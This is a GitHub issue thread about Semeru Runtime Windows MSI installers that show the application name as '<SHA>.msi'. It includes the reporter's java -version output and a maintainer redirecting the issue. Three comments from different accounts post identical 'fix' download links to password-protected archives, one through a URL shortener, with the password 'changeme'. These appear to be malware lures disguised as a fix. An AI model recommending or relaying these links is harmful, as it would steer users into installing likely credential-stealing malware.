### ISSUE TITLE
The msi files for Semeru Runtime downloads show dialog with the application name as SHA.msi

### ISSUE THREAD

**Issue by manqingl** [eclipse-openj9/openj9#20063]
I downloaded the msi file : https://github.com/ibmruntimes/semeru21-binaries/releases/download/jdk-21.0.4%2B7_openj9-0.46.0/ibm-semeru-open-jre_x64_windows_21.0.4_7_openj9-0.46.0.msi

After starting installation, Windows pop up a dialog which shows the application name as <SHA>.msi.

JDK msi and uninstallation also show it as <SHA>.msi.

**Comment by manqingl** [comment]
![20240827_091011](https://github.com/user-attachments/assets/16557ab5-c0a1-44f0-9bbe-39af45eab0f3)

**Comment by manqingl** [comment]
C:\pmrs>java -version
openjdk version "21.0.4" 2024-07-16 LTS
IBM Semeru Runtime Open Edition 21.0.4.0 (build 21.0.4+7-LTS)
Eclipse OpenJ9 VM 21.0.4.0 (build openj9-0.46.0, JRE 21 Windows 11 amd64-64-Bit Compressed References 20240716_229 (JIT enabled, AOT enabled)
OpenJ9   - 1a6f6128aa
OMR      - 840a9adba
JCL      - 7d844187b25 based on jdk-21.0.4+7)

C:\pmrs>

**Comment by AzEred0** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by pshipton** [comment]
This is a Semeru issue, not OpenJ9. Better opened at https://github.com/ibmruntimes/Semeru-Runtimes/issues
